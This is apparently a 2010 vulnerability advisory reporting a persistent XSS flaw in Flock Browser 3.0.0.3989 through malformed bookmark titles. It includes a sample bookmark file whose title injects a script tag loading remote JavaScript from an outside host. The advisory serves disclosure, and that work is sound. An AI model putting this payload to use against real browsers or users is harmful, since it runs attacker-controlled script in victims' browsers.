######################################### Flock Browser 3.0.0.3989 Malformed Bookmark XSS Vendor URL: http://beta.flock.com/ Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html Vendor notify:NO exploits availables:YES ######################################### Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends.This browser version (3.0.0.3989) is based in a old chromium project Flock has a flaw that allows Cross-site scripting style attacks In bookmarks is has a Malformed bookmark title persistent xss when inport from other browsers a malformed bookmark or when add a new malformed bookmark or import a bookmark html file. ############################### Example Of Bookmark html file ############################### Bookmarks

Men� Marcadores

"><script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'>

#####################EOF################## �It is a persintent script insercion and when the user click in the menu for view favorites page or access directly to favorites url �this make a "defacement" of this page and them the user can�t access to favorites :) ( Url of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title ) �################# �nd ####################### Atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente.... -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....